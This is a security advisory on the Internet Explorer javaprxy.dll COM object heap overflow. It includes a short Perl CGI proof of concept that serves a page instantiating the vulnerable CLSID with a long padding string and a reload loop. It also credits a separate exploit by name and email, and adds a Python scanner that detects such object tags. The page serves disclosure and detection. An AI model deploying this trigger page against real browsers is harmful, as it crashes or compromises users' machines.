Microsoft Internet Explorer Javaprxy.DLL COM Object Instantiation Heap Overflow Vulnerability
UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following proof-of-concept CGI script was provided to demonstrate the vulnerability. An additional proof of concept (javaprxy.pl) is made available by FrSIRT:

    #!/usr/bin/perl
    # in order for this to work javaprxy.dll must be available on the client.
    my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll
    my $html1 = "<html><body>\n<object classid=\"CLSID:".$clsid."\"></object>\n";
    my $html2 = "\n</body><script>location.reload();</script></html>\n";
    print "Content-Type: text/html;\r\n\r\n";
    print $html1.("A"x30000).$html2;

Exploit code javaprxy_exp.c has been provided by K.K.Senthil Velan <senthilvelan_kk@sifycorp.com>.
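For detection, the proof of concept above is recognisable by its object tag, which instantiates the javaprxy.dll CLSID from a web page. The following Python scanner is an added example, not part of the original advisory or of any vendor tooling: it reports object tags whose classid resolves to that CLSID, including case, brace and character-reference variants. The function names and the sample pages are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID of javaprxy.dll, taken from the proof of concept on this page.
JAVAPRXY_CLSID = "03D9F3F2-B0E3-11D2-B081-006008039BF0"

_CLSID_RE = re.compile(
    r"^\s*clsid\s*:\s*\{?\s*"
    r"([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\s*\}?\s*$",
    re.IGNORECASE,
)

def normalize_classid(value):
    """Return the upper-case GUID from a classid attribute value, or None."""
    match = _CLSID_RE.match(value or "")
    return match.group(1).upper() if match else None

class ObjectTagScanner(HTMLParser):
    """Collects (line, GUID) for object tags that use a watched CLSID."""
    def __init__(self, watched):
        super().__init__(convert_charrefs=True)
        self.watched = {guid.upper() for guid in watched}
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names and decodes
        # character references in attribute values before this is called.
        if tag != "object":
            return
        for name, value in attrs:
            guid = normalize_classid(value) if name == "classid" else None
            if guid in self.watched:
                self.hits.append((self.getpos()[0], guid))

def scan_html(text, watched=(JAVAPRXY_CLSID,)):
    scanner = ObjectTagScanner(watched)
    scanner.feed(text)
    scanner.close()
    return scanner.hits

# Constructed sample pages (not captured traffic).
SAMPLE_POC_STYLE = ('<html><body>\n<object classid="CLSID:%s"></object>\n'
                    '</body></html>\n' % JAVAPRXY_CLSID)
SAMPLE_OBFUSCATED = ('<OBJECT ClassID="clsid&#58;{03d9f3f2-b0e3-11d2-b081-'
                     '006008039bf0}"></OBJECT>')
SAMPLE_BENIGN = ('<object classid="clsid:11111111-2222-3333-4444-555555555555">'
                 '</object>')

if __name__ == "__main__":
    for label in ("SAMPLE_POC_STYLE", "SAMPLE_OBFUSCATED", "SAMPLE_BENIGN"):
        print(label, scan_html(globals()[label]))
```

The scanner only sees object tags present in the served markup; tags written into the page by script at run time would need inspection of the rendered document instead.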